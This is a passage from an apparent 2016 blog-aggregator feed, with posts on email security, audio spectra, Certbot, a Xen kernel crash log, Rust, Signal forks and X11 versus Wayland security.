Of course, this is all done on the commandline, but that is somewhat expected if you are already running Notmuch. Of course, it would be much easier to edit those filters through a GUI. Roundcube has a nice Sieve plugin, and Thunderbird has such a plugin as well. Since Sieve is a standard, there's a bunch of clients available. All those need you to set up some sort of thing on the server, which I didn't bother doing yet.

And of course, a key improvement would be to have Notmuch synchronize its state better with the mailboxes directly, instead of having the notmuch-purge hack above. Dovecot and Maildir formats support up to 26 flags, and there were discussions about using those flags to synchronize with notmuch tags so that multiple notmuch clients can see the same tags on different machines transparently.

This, however, won't make Notmuch work on my phone or webmail or any other more generic client: for that, Sieve rules are still very useful.

I still don't have webmail set up at all: so to read email, I need an actual client, which is currently my phone, which means I need to have Wifi access to read email. "Internet Cafés" or "this guy's computer" won't work as well, although I can always use ssh to log in straight to the server and read mails with Mutt.

I am also considering using X509 client certificates to authenticate to the mail server without a passphrase. This involves configuring Postfix, which seems simple enough. Dovecot's configuration seems a little more involved and less well documented. It seems that both OfflineIMAP and K-9 Mail support client-side certs. OfflineIMAP prompts me for the password so it doesn't get leaked anywhere. I am a little concerned about building yet another CA, but I guess it would not be so hard...

The server side of things needs more documenting, particularly the spam filters. This is currently spread around this wiki, mostly in configuration.

Security considerations

The whole purpose of this was to make it easier to read my mail on other devices. This introduces a new vulnerability: someone may steal that device or compromise it to read my mail, impersonate me on different services and even get a shell on the remote server.

Thanks to the two-factor authentication I setup on the server, I feel a little more confident that just getting the passphrase to the mail account isn't sufficient anymore in leveraging shell access. It also allows me to login with ssh on the server without trusting the machine too much, although that only goes so far... Of course, sudo is then out of the question and I must assume that everything I see is also seen by the attacker, which can also inject keystrokes and do all sorts of nasty things.

Since I also connected my email account on my phone, someone could steal the phone and start impersonating me. The mitigation here is that there is a PIN for the screen lock, and the phone is encrypted. Encryption isn't so great when the passphrase is a PIN, but I'm working on having a better key that is required on reboot, and the phone shuts down after 5 failed attempts. This is documented in my phone setup.

Client-side X509 certificates further mitigate those kinds of compromises, as the X509 certificate won't give shell access.

Basically, if the phone is lost, all hell breaks loose: I need to change the email password (or revoke the certificate), as I assume the account is about to be compromised. I do not trust Android security to give me protection indefinitely. In fact, one could argue that the phone is already compromised and putting the password there already enabled a possible state-sponsored attacker to hijack my email address. This is why I have an OpenPGP key on my laptop to authenticate myself for critical operations like code signatures.

The risk of identity theft from the state is, after all, a tautology: the state is the primary owner of identities, some could say by definition. So if a state-sponsored attacker would like to masquerade as me, they could simply issue a passport under my name and join a OpenPGP key signing party, and we'd have other problems to deal with, namely, proper infiltration counter-measures and counter-snitching.

by Planet Python at 2016-05-12 23:29

The Endeavour

Tonal prominence in a leaf blower - The Endeavour

leaf blower

This afternoon I was working on a project involving tonal prominence. I stepped away from the computer to think and was interrupted by the sound of a leaf blower. I was annoyed for a second, then I thought “Hey, a leaf blower!” and went out to record it. A leaf blower is a great example of a broad spectrum noise with strong tonal components. Lawn maintenance men think you’re kinda crazy when you say you want to record the noise of their equipment.

The tuner app on my phone identified the sound as an A3, the A below middle C, or 220 Hz. Apparently leaf blowers are tenors.

Here’s a short audio clip:

 

And here’s what the spectrum looks like. The dashed grey vertical lines are at multiples of 55 Hz.

leaf blower audio spectrum

The peaks are perfectly spaced at multiples of the fundamental frequency of 55 Hz, A1 in scientific pitch notation. This even spacing of peaks is the fingerprint of a definite tone. There's also a lot of random fluctuation between peaks. That's the fingerprint of noise. So together we hear a pitch and noise.

When using the tone-to-noise ratio algorithm from the ECMA-74, only the spike at 110 Hz is prominent. A limitation of that approach is that it only considers single tones, not how well multiple tones line up in a harmonic sequence.
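
Not the post's own code, but a rough sketch of how one might check for that harmonic spacing with NumPy and SciPy; the file name leafblower.wav and the 2 kHz cutoff are assumptions, and the 55 Hz fundamental is taken from the post:

# Sketch (not the original analysis): estimate the spectrum of a recording
# and report prominent peaks as multiples of an assumed 55 Hz fundamental.
import numpy as np
from scipy.io import wavfile
from scipy.signal import find_peaks

rate, audio = wavfile.read("leafblower.wav")  # hypothetical file name
if audio.ndim > 1:                            # fold stereo down to mono
    audio = audio.mean(axis=1)

spectrum = np.abs(np.fft.rfft(audio))
freqs = np.fft.rfftfreq(len(audio), d=1.0 / rate)

# Look below 2 kHz and keep peaks at least 10% as tall as the largest one.
low = freqs < 2000
peaks, _ = find_peaks(spectrum[low], height=spectrum[low].max() * 0.1)
for f in freqs[low][peaks]:
    print(f"peak at {f:6.1f} Hz ({f / 55.0:.1f} x 55 Hz)")

If the peaks really are evenly spaced, the printed ratios come out close to whole numbers, and the 220 Hz tone the tuner app reported is simply the fourth harmonic, two octaves above the 55 Hz fundamental.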


by John at 2016-05-12 22:35

LWN.net

Announcing Certbot: EFF's Client for Let's Encrypt - LWN.net

The Electronic Frontier Foundation (EFF) has announced a new name and web site for the Let's Encrypt client. The Let's Encrypt project is a free certificate authority for TLS certificates that enable HTTPS for the web. The client, now called "Certbot", uses Automatic Certificate Management Environment (ACME) to talk to the Let's Encrypt CA, though it will no longer be the "official" client and there are other ACME clients that can be used. "Along with the rename, we've also launched a brand new website for Certbot, found at https://certbot.eff.org. The site includes frequently asked questions as well as links to how you can learn more and help support the project, but by far the biggest feature of the website is an interactive instruction tool. To get the specific commands you need to get Certbot up and running, just input your operating system and webserver. No more searching through pages and pages of documentation or Google search results! While a new name has the potential for creating technical issues, the Certbot team has worked hard to make this transition as seamless as possible. Packages installed from PyPI, letsencrypt-auto, and third party plugins should all continue to work and receive updates without modification. We expect OS packages to begin using the Certbot name in the next few weeks as well. On many systems, the current client packages will automatically transition to Certbot while continuing to support the letsencrypt command so you won't have to edit any scripts you're currently using."

by jake at 2016-05-12 22:29

Planet Ubuntu

Nicholas Skaggs: Getting your daily dose of juju - Planet Ubuntu

One of the first pain points I've been attempting to help smooth out was how Juju is packaged and consumed. The Juju QA Team have put together a new daily ppa you can use, dubbed the Juju Daily ppa. It contains the latest blessed builds from CI testing. Installing this ppa and upgrading regularly allows you to stay in sync with the absolute latest version of Juju that passes our CI testing.

Naturally, this ppa is intended for those who like living on the edge, so it's not recommended for production use. If you find bugs, we'd love to hear about them!

To add the ppa, you will need to add ppa:juju/daily to your software sources.

sudo add-apt-repository ppa:juju/daily

Do be aware that adding this ppa will upgrade any version of Juju you may have installed. Also note this ppa contains builds without published streams, so you will need to generate or acquire streams on your own. For most users, this means you should pass --upload-tools during the bootstrap process. However you may also pass the agent-metadata-url and agent-stream as config options. See the ppa description and simplestreams documentation for more details.

Finally, should you wish to revert to a stable version of Juju, you can use the ppa-purge tool to remove the daily ppa and the installed version of Juju.

I'd love to hear your feedback, and encourage you to give it a try.

by Nicholas Skaggs (noreply@blogger.com) at 2016-05-12 20:36

PHD Comics

05/11/16 PHD comic: 'Final Draft' - PHD Comics

Piled Higher & Deeper by Jorge Cham
www.phdcomics.com
Click on the title below to read the comic
title: "Final Draft" - originally published 5/11/2016

For the latest news in PHD Comics, CLICK HERE!

by PHD Comics at 2016-05-12 20:00

Bluejo's Journal

Thud: Poor Relations - Bluejo's Journal

Words: 1665
Total words: 55304
Files: 5
Music: No music, no writing music on the computer, should get some
Tea: Elderflower and Lemon
Reason for stopping: bedtime

Revised the chapter I wrote Saturday, and wrote a new alien bit. And I know what happens next. Well, reasonably -- at the right degree I need to know to start writing it.

I am in Orleans. If I am going to travel more, I need to get better at writing while I am travelling, so.

Back to Paris tomorrow and then Saint Malo for Etonnants Voyageurs Saturday.

by Bluejo's Journal (bluejo@gmail.com) at 2016-05-12 19:59

Planet Debian

Ingo Juergensmann: Xen randomly crashing server - part 2 - Planet Debian

Some weeks ago I blogged about "Xen randomly crashing server". The problem back then was that I couldn't get any information about why the server was rebooting. Using a netconsole was not possible, because netconsole refused to work with the bridge that is used for Xen networking. Luckily my colocation partner rrbone.net connected the second network port of my server to the network so that I could use eth1 instead of the bridged eth0 for netconsole.

Today the server crashed several times and I was able to collect some more information than just the screenshots from IPMI/KVM console as shown in my last blog entry (full netconsole output is attached as a file): 

May 12 11:56:39 31.172.31.251 [829681.040596] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 3.16.0-4-amd64 #1 Debian 3.16.7-ckt25-2
May 12 11:56:39 31.172.31.251 [829681.040647] Hardware name: Supermicro X9SRE/X9SRE-3F/X9SRi/X9SRi-3F/X9SRE/X9SRE-3F/X9SRi/X9SRi-3F, BIOS 3.0a 01/03/2014
May 12 11:56:39 31.172.31.251 [829681.040701] task: ffffffff8181a460 ti: ffffffff81800000 task.ti: ffffffff81800000
May 12 11:56:39 31.172.31.251 [829681.040749] RIP: e030:[<ffffffff812b7e56>]
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.040802] RSP: e02b:ffff880280e03a58  EFLAGS: 00010286
May 12 11:56:39 31.172.31.251 [829681.040834] RAX: ffff88026eec9070 RBX: ffff88023c8f6b00 RCX: 00000000000000ee
May 12 11:56:39 31.172.31.251 [829681.040880] RDX: 00000000000004a0 RSI: ffff88006cd1f000 RDI: ffff88026eec9422
May 12 11:56:39 31.172.31.251 [829681.040927] RBP: ffff880280e03b38 R08: 00000000000006c0 R09: ffff88026eec9062
May 12 11:56:39 31.172.31.251 [829681.040973] R10: 0100000000000000 R11: 00000000af9a2116 R12: ffff88023f440d00
May 12 11:56:39 31.172.31.251 [829681.041020] R13: ffff88006cd1ec66 R14: ffff88025dcf1cc0 R15: 00000000000004a8
May 12 11:56:39 31.172.31.251 [829681.041075] FS:  0000000000000000(0000) GS:ffff880280e00000(0000) knlGS:ffff880280e00000
May 12 11:56:39 31.172.31.251 [829681.041124] CS:  e033 DS: 0000 ES: 0000 CR0: 0000000080050033
May 12 11:56:39 31.172.31.251 [829681.041153] CR2: ffff88006cd1f000 CR3: 0000000271ae8000 CR4: 0000000000042660
May 12 11:56:39 31.172.31.251 [829681.041202] Stack:
May 12 11:56:39 31.172.31.251 [829681.041225]  ffffffff814d38ff
May 12 11:56:39 31.172.31.251  ffff88025b5fa400
May 12 11:56:39 31.172.31.251  ffff880280e03aa8
May 12 11:56:39 31.172.31.251  9401294600a7012a
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041287]  0100000000000000
May 12 11:56:39 31.172.31.251  ffffffff814a000a
May 12 11:56:39 31.172.31.251  000000008181a460
May 12 11:56:39 31.172.31.251  00000000000080fe
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041346]  1ad902feff7ac40e
May 12 11:56:39 31.172.31.251  ffff88006c5fd980
May 12 11:56:39 31.172.31.251  ffff224afc3e1600
May 12 11:56:39 31.172.31.251  ffff88023f440d00
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041407] Call Trace:
May 12 11:56:39 31.172.31.251 [829681.041435]  <IRQ>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041441]
May 12 11:56:39 31.172.31.251  [<ffffffff814d38ff>] ? ndisc_send_redirect+0x3bf/0x410
May 12 11:56:39 31.172.31.251 [829681.041506]  [<ffffffff814a000a>] ? ipmr_device_event+0x7a/0xd0
May 12 11:56:39 31.172.31.251 [829681.041548]  [<ffffffff814bc74c>] ? ip6_forward+0x71c/0x850
May 12 11:56:39 31.172.31.251 [829681.041585]  [<ffffffff814c9e54>] ? ip6_route_input+0xa4/0xd0
May 12 11:56:39 31.172.31.251 [829681.041621]  [<ffffffff8141f1a3>] ? __netif_receive_skb_core+0x543/0x750
May 12 11:56:39 31.172.31.251 [829681.041729]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.041771]  [<ffffffffa0585eb2>] ? br_handle_frame_finish+0x1c2/0x3c0 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041821]  [<ffffffffa058c757>] ? br_nf_pre_routing_finish_ipv6+0xc7/0x160 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041872]  [<ffffffffa058d0e2>] ? br_nf_pre_routing+0x562/0x630 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041907]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041955]  [<ffffffff8144fb65>] ? nf_iterate+0x65/0xa0
May 12 11:56:39 31.172.31.251 [829681.041987]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042035]  [<ffffffff8144fc16>] ? nf_hook_slow+0x76/0x130
May 12 11:56:39 31.172.31.251 [829681.042067]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042116]  [<ffffffffa0586220>] ? br_handle_frame+0x170/0x240 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042148]  [<ffffffff8141ee24>] ? __netif_receive_skb_core+0x1c4/0x750
May 12 11:56:39 31.172.31.251 [829681.042185]  [<ffffffff81009f9c>] ? xen_clocksource_get_cycles+0x1c/0x20
May 12 11:56:39 31.172.31.251 [829681.042217]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.042251]  [<ffffffffa063f50f>] ? xenvif_tx_action+0x49f/0x920 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042299]  [<ffffffffa06422f8>] ? xenvif_poll+0x28/0x70 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042331]  [<ffffffff8141f7b0>] ? net_rx_action+0x140/0x240
May 12 11:56:39 31.172.31.251 [829681.042367]  [<ffffffff8106c6a1>] ? __do_softirq+0xf1/0x290
May 12 11:56:39 31.172.31.251 [829681.042397]  [<ffffffff8106ca75>] ? irq_exit+0x95/0xa0
May 12 11:56:39 31.172.31.251 [829681.042432]  [<ffffffff8135a285>] ? xen_evtchn_do_upcall+0x35/0x50
May 12 11:56:39 31.172.31.251 [829681.042469]  [<ffffffff8151669e>] ? xen_do_hypervisor_callback+0x1e/0x30
May 12 11:56:39 31.172.31.251 [829681.042499]  <EOI>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.042506]
May 12 11:56:39 31.172.31.251  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042561]  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042592]  [<ffffffff81009e7c>] ? xen_safe_halt+0xc/0x20
May 12 11:56:39 31.172.31.251 [829681.042627]  [<ffffffff8101c8c9>] ? default_idle+0x19/0xb0
May 12 11:56:39 31.172.31.251 [829681.042666]  [<ffffffff810a83e0>] ? cpu_startup_entry+0x340/0x400
May 12 11:56:39 31.172.31.251 [829681.042705]  [<ffffffff81903076>] ? start_kernel+0x497/0x4a2
May 12 11:56:39 31.172.31.251 [829681.042735]  [<ffffffff81902a04>] ? set_init_arg+0x4e/0x4e
May 12 11:56:39 31.172.31.251 [829681.042767]  [<ffffffff81904f69>] ? xen_start_kernel+0x569/0x573
May 12 11:56:39 31.172.31.251 [829681.042797] Code:
May 12 11:56:39 31.172.31.251  <f3>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.043113] RIP
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.043145]  RSP <ffff880280e03a58>
May 12 11:56:39 31.172.31.251 [829681.043170] CR2: ffff88006cd1f000
May 12 11:56:39 31.172.31.251 [829681.043488] ---[ end trace 1838cb62fe32daad ]---
May 12 11:56:39 31.172.31.251 [829681.048905] Kernel panic - not syncing: Fatal exception in interrupt
May 12 11:56:39 31.172.31.251 [829681.048978] Kernel Offset: 0x0 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffff9fffffff)

I'm not that good at reading this kind of output, but to me it seems that ndisc_send_redirect is at fault. When googling for "ndisc_send_redirect" you can find a patch on lkml.org and Debian bug #804079, both seem to be related to IPv6.

When looking at the linux kernel source mentioned in the lkml patch I see that this patch is already applied (line 1510): 

        if (ha) 
                ndisc_fill_addr_option(buff, ND_OPT_TARGET_LL_ADDR, ha);

So, although the patch was intended to prevent "leading to data corruption or in the worst case a panic when the skb_put failed", it does not help in my case or in the case of #804079.

Any tips are appreciated!

PS: I'll contribute to that bug in the BTS, of course!

Attachment: syslog-xen-crash.txt (24.27 KB)

by ij at 2016-05-12 18:38

LWN.net

Thursday's security advisories - LWN.net

Debian-LTS has updated ocaml (code execution) and xerces-c (code execution).

Fedora has updated kernel (F23: information leak), ntp (F22: multiple vulnerabilities), php (F22: multiple vulnerabilities), subversion (F23: two vulnerabilities), and xen (F23: two vulnerabilities).

Mageia has updated libtasn1 (denial of service) and squid (two vulnerabilities).

Oracle has updated pcre (OL7: multiple vulnerabilities).

Red Hat has updated kernel (RHEL7: privilege escalation), kernel-rt (RHEL7; RHEL6: privilege escalation), and thunderbird (two vulnerabilities).

Slackware has updated thunderbird (multiple vulnerabilities).

SUSE has updated mysql (SLE11: multiple vulnerabilities), ntp (SLE11: multiple vulnerabilities), and php5 (SLE12: multiple vulnerabilities).

Ubuntu has updated qemu, qemu-kvm (multiple vulnerabilities).

by jake at 2016-05-12 16:44

Julia Evans

A second try at using Rust - Julia Evans

I used Rust for the first time in late 2013, while trying to write a tiny operating system. At the time, I learned a lot and it was pretty fun, but I found the experience pretty frustrating. There were all these error messages I didn't understand! It took forever to work with strings! Everyone was very nice but it felt confusing.

I just tried Rust again yesterday! Kamal has been trying to sell me (and everyone else) on the idea that if you're doing systems-y work, and you don't know any systems language very well, then it's worth learning Rust.

After a day or so of trying Rust again, I think he's right that learning Rust is easier than learning C. A few years after first trying, I feel like the language has progressed a lot, and it feels more like writing Python or some other easy language.

Some things I could do easily without working too hard

  • run a process and then match a regular expression on its output
  • make a hashmap, store counts in it, and print the top 10
  • format strings nicely and print them
  • read command line options
  • allocate a lot of memory without creating a memory leak

Those things would have been really hard in C (how do you even make a hashmap??? I think you have to write the data structure yourself or something.). I probably could have figured out how to free memory in C (i hear you use free :) ) but honestly I don't know how to write C and it's very likely it would have turned into an unmaintainable mess. The things were maybe slightly harder to do than in Python (which is a programming language that I actually know), but I think not way way way harder. I was surprised at how easy they were!

a sidebar on learning programming languages

I pair programmed a bunch of Rust code with Kamal, who actually knows Rust. Sometimes when I program, I try to understand everything all at once right away ("what are lifetimes? how do they work? what are all these pointer types? omg!!!"). This time I tried a new approach! When I didn't understand something, I was just like "hey kamal tell me what to type!" and he would, and then my program would work.

I'd fix the bugs that I understood, and he'd fix the bugs I didn't, and we made a lot of progress really quickly and it wasn't that frustrating.

I kind of enjoy the experience of having a Magical Oracle to fix my programming problems for me -- having someone elide away the harder stuff so I can focus on what's easy feels to me like a good way to learn.

Of course, you can't let someone else fix all your hard programs forever. Eventually I'll have to understand all about Rust pointers and lifetimes and everything, if I want to write Rust! I bet it's not even all that hard. But for today I only understand like 6 things and that's fine.

error messages

I've also been mostly happy with the Rust error messages! Sometimes they're super inscrutable, but often they're mostly lucid. Sometimes they link to GitHub issues, and someone on the GitHub issue will have a workaround for your problem! Sometimes they come with detailed explanations!

Here's an example:

$ rustc --explain E0281
You tried to supply a type which doesn't implement some trait in a location
which expected that trait. This error typically occurs when working with
`Fn`-based types. Erroneous code example:

---
fn foo<F: Fn()>(x: F) { }

fn main() {
    // type mismatch: the type ... implements the trait `core::ops::Fn<(_,)>`,
    // but the trait `core::ops::Fn<()>` is required (expected (), found tuple
    // [E0281]
    foo(|y| { });
}
---

The issue in this case is that `foo` is defined as accepting a `Fn` with no
arguments, but the closure we attempted to pass to it requires one argument.

valgrind + perf + rust = <3

another cool thing I noticed is that you can run valgrind or perf on the Rust program and figure out easily which parts of your program are running slowly! And I think the Rust program even has debug info so you can look at the source code in kcachegrind. This was really cool. I ran into a problem with valgrind where my program worked fine in Rust, but when I ran it under valgrind it failed. I don't understand why this happened at all.

the rust docs actually seem good?

I haven't delved super a lot into the Rust docs, but so far I've been happy: there's a book and lots of other documentation and it's all official on the Rust website! I think they actually paid Steve Klabnik to write docs, which is amazing.

Here is my Rust project! More on what it actually does later, but I'm super excited about it (for now it's a MYSTERY :D :D).

by Julia Evans at 2016-05-12 15:55

Planet GNOME

Stef Walter: Cockpit 0.106 - Planet GNOME

Cockpit is the modern Linux admin interface. There's a new release every week. Here are the highlights from this week's 0.106 release.

Stable Cockpit Styles

One of the annoying things about CSS is that when you bring in stylesheets from multiple projects, they can conflict. You have to choose a nomenclature to namespace your CSS, or nest it appropriately.

We’re stabilizing the internals of Cockpit in the browser, so when folks write plugins, they can count on them working. To make that happen we had to namespace all our own Cockpit specific CSS classes. Most of the styling used in Cockpit come from Patternfly and this change doesn’t affect those styles at all.

Documentation is on the wiki

Container Image Layers

Docker container image layers are now shown much more clearly. It should be clearer to tell which is the base layer, and how the others are layered on top:

Image Layers

Try it out

Cockpit 0.106 is available now:

by Planet GNOME at 2016-05-12 15:40

Planet Ubuntu

Ubuntu Podcast from the UK LoCo: S09E11 – Sweet Baby Robocop - Ubuntu Podcast - Planet Ubuntu

It’s Episode Eleven of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

by Planet Ubuntu at 2016-05-12 15:11

Planet GNOME

Matthew Garrett: Convenience, security and freedom - can we pick all three? - Planet GNOME

Moxie, the lead developer of the Signal secure communication application, recently blogged on the tradeoffs between providing a supportable federated service and providing a compelling application that gains significant adoption. There's a set of perfectly reasonable arguments around that that I don't want to rehash - regardless of feelings on the benefits of federation in general, there's certainly an increase in engineering cost in providing a stable intra-server protocol that still allows for addition of new features, and the person leading a project gets to make the decision about whether that's a valid tradeoff.

One voiced complaint about Signal on Android is the fact that it depends on the Google Play Services. These are a collection of proprietary functions for integrating with Google-provided services, and Signal depends on them to provide a good out of band notification protocol to allow Signal to be notified when new messages arrive, even if the phone is otherwise in a power saving state. At the time this decision was made, there were no terribly good alternatives for Android. Even now, nobody's really demonstrated a free implementation that supports several million clients and has no negative impact on battery life, so if your aim is to write a secure messaging client that will be adopted by as many people as possible, keeping this dependency is entirely rational.

On the other hand, there are users for whom the decision not to install a Google root of trust on their phone is also entirely rational. I have no especially good reason to believe that Google will ever want to do something inappropriate with my phone or data, but it's certainly possible that they'll be compelled to do so against their will. The set of people who will ever actually face this problem is probably small, but it's probably also the set of people who benefit most from Signal in the first place.

(Even ignoring the dependency on Play Services, people may not find the official client sufficient - it's very difficult to write a single piece of software that satisfies all users, whether that be down to accessibility requirements, OS support or whatever. Slack may be great, but there's still people who choose to use Hipchat)

This shouldn't be a problem. Signal is free software and anybody is free to modify it in any way they want to fit their needs, and as long as they don't break the protocol code in the process it'll carry on working with the existing Signal servers and allow communication with people who run the official client. Unfortunately, Moxie has indicated that he is not happy with forked versions of Signal using the official servers. Since Signal doesn't support federation, that means that users of forked versions will be unable to communicate with users of the official client.

This is awkward. Signal is deservedly popular. It provides strong security without being significantly more complicated than a traditional SMS client. In my social circle there's massively more users of Signal than any other security app. If I transition to a fork of Signal, I'm no longer able to securely communicate with them unless they also install the fork. If the aim is to make secure communication ubiquitous, that's kind of a problem.

Right now the choices I have for communicating with people I know are either convenient and secure but require non-free code (Signal), convenient and free but insecure (SMS) or secure and free but horribly inconvenient (gpg). Is there really no way for us to work as a community to develop something that's all three?


by Planet GNOME at 2016-05-12 14:50

planet.freedesktop.org

Christian Schaller: H264 in Fedora Workstation - planet.freedesktop.org

So after a lot of work to put the policies and pieces in place, we are now giving Fedora users access to the OpenH264 plugin from Cisco. Dennis Gilmore posted a nice blog entry explaining how you can install OpenH264 in Fedora 24.

That said, the plugin is of limited use today for a variety of reasons, the first being that it only supports the Baseline profile. For those not intimately familiar with H264, profiles are basically a way to define subsets of the codec. As the name suggests, the Baseline profile sits near the bottom of the H264 profile list, so a file encoded with a higher profile will not decode with it. The profile you need for most online videos is the High profile. On the other hand, if you encode a file using OpenH264 it will work with any decoder that can handle Baseline or higher, which is basically all of them. And there are some things that do use H264 Baseline, such as WebRTC.
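To make the profile point concrete, here is a minimal sketch (not from the post) of checking for and using the OpenH264 GStreamer elements from Python. It assumes GStreamer 1.x with PyGObject and the openh264 plugin installed, and that the elements are named openh264enc/openh264dec as shipped in gst-plugins-bad:

    # Sketch only: check whether the OpenH264 GStreamer elements are
    # available, then encode a short test clip with openh264enc.  The
    # resulting stream uses the Baseline profile, which (per the text
    # above) any H264 decoder should be able to play back.
    import gi
    gi.require_version('Gst', '1.0')
    from gi.repository import Gst

    Gst.init(None)

    for name in ('openh264dec', 'openh264enc'):
        factory = Gst.ElementFactory.find(name)
        print(name, 'available' if factory else 'missing')

    # Encode 100 frames of test video to an MP4 file.
    pipeline = Gst.parse_launch(
        'videotestsrc num-buffers=100 ! openh264enc ! h264parse '
        '! mp4mux ! filesink location=test-openh264.mp4')
    pipeline.set_state(Gst.State.PLAYING)
    bus = pipeline.get_bus()
    bus.timed_pop_filtered(Gst.CLOCK_TIME_NONE,
                           Gst.MessageType.EOS | Gst.MessageType.ERROR)
    pipeline.set_state(Gst.State.NULL)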

But we realize that to make this a truly useful addition for our users we need to improve the profile support in OpenH264. Luckily we have Wim Taymans looking at the issue, and he will work with Cisco engineers to widen the range of profiles supported.

Of course just adding H264 doesn't solve the codec issue, and we are looking at ways to bring even more codecs to Fedora Workstation. There is a limit to what we can do there, but I do think we will have some announcements this year that will bring us a lot closer, and in the long term I am confident that efforts like the Alliance for Open Media will provide a path to a future dominated by royalty-free media formats.

But for now thanks to everyone involved from Cisco, Fedora Release Engineering and the Workstation Working Group for helping to make this happen.

by planet.freedesktop.org at 2016-05-12 14:30

Planet GNOME

Morten Welinder: Security From Whom? - Planet GNOME

Secure from whom? I was asked after my recent post questioning the positioning of Mir/Wayland as a security improvement.

Excellent question — I am glad you asked! Let us take a look at the whos and compare.

To take advantage of the X11 protocol issues, you need to be able to speak X11 to the server. Assuming you haven't misconfigured something (ssh or your file permissions) so other users' software can talk to your server, that means causing you to run evil X11 protocol code like XEvilTeddy. Who can do that? Well, there are probably a few thousand people who can. That is a lot, but most of them are application developers or maintainers who would have to sneak the changes in via source form. That is possible, but it is slow, has a high risk of discovery, and has problems with deniability. And choosing X11 as a mechanism is just plain silly: just contact a command-and-control server and download the evil payload instead. There are also a smaller number of people who can attack via binaries, either because distributions take binaries directly from them or because they can change and re-sign binary packages. That would mean your entire distribution is compromised, and choosing the X11 attack is really silly again.
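To make "speaking X11 to the server" concrete, here is a tiny sketch (mine, not XEvilTeddy) showing that any local process which can open your display can already enumerate every other client's windows; it assumes python-xlib is installed:

    # Sketch only: list the top-level windows of every client connected
    # to the same X display.  Any process that can open $DISPLAY can do
    # this; no special privileges are involved.
    from Xlib import display

    d = display.Display()          # connect to the display in $DISPLAY
    root = d.screen().root
    for win in root.query_tree().children:
        name = win.get_wm_name()   # may be None for unnamed windows
        if name:
            print(hex(win.id), name)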

Now, let us look at the who of a side-channel attack. This requires the ability to run code on your machine, but it does not have to be code that can speak X11 to your X server equivalent. It can be sand-boxed code such as javascript even when the sand-box is functioning as designed. Who can do that? Well, anyone who controls a web server you visit; plus any adserver network used by such web servers; plus anyone buying ads from such adserver networks. In short, just about anyone. And tracking the origin of such code created by an evil advertiser would be extremely hard.

So to summarize: attacking the X11 protocol is possible by a relatively small group of people who have much better methods available to them; attacking via side-channel can be done by a much wider group who probably do not have better methods. The former threat is so small as to be irrelevant in the face of the second.

Look, it is not that I think of security in black and white terms. I do not. But if improved security is your motivation then looking at a Linux laptop and deciding that pouring man-decades into a partial replacement for the X server is what needs doing is a bad engineering decision when there are so many more important concerns, i.e., you are doing it wrong. And selling said partial X server replacement as a security improvement is at best misleading and uninformed.

On the other hand, if you are working on Mir/Wayland because that kind of thing floats your boat, then fine. But please do not scream “security!” when you break, say, my colour picker.

by Planet GNOME at 2016-05-12 13:20

Planet Python

Python Anywhere: Scaling a startup from side project to 20 million hits/month - an interview with railwayapi.com creator Kaustubh - Planet Python

We recently wished farewell to a customer who had been with us for about 18 months, during which time he saw some incredible growth in what was originally just a side project. We spoke to him about how he found the experience of scaling on PythonAnywhere, and why he decided to move on.

railwayapi.com stats
Project started: October 2014
Requests: 20 million / month
Active users: 1000+

What's your background? How long have you been programming?

I am currently pursuing a Bachelor's in Computer Science & Engineering. I have been programming since my school days, but RailwayAPI was the first substantial project I did.

Can you describe what railwayapi.com does? What first gave you the idea to build a site like this?

It all started with an idea to build an app which lets train travelers in India find the best available route between two stations. It's very difficult to get confirmed bookings in India, so I thought it would be great if there was an app which helps people break their journey up, using multiple trains to reach their destination in the minimum time.

While working on that idea I realized that I needed train data to make such a thing possible. There wasn't a reliable API for Indian railways and I realized that several developers would be facing the same problem. And hence RailwayAPI was born.

It is a collection of APIs which let developers access all kinds of Railway data, like Seat Availability, Train Route, Live Train status and so on, in easy-to-use JSON formats.
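As a purely hypothetical illustration of the "JSON over HTTP GET" shape described above (the interview does not give the real endpoint paths, parameters or authentication scheme, so everything below is a placeholder):

    # Hypothetical client sketch; the host, path and parameter names are
    # placeholders, not the real railwayapi.com API.
    import requests

    BASE = "https://api.example.invalid"   # placeholder host

    resp = requests.get(BASE + "/live-status",
                        params={"train": "12345"},  # made-up parameter
                        timeout=10)
    resp.raise_for_status()
    print(resp.json())   # the data comes back as easy-to-use JSON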

Why did you choose Python and Flask? Are you happy with your choice?

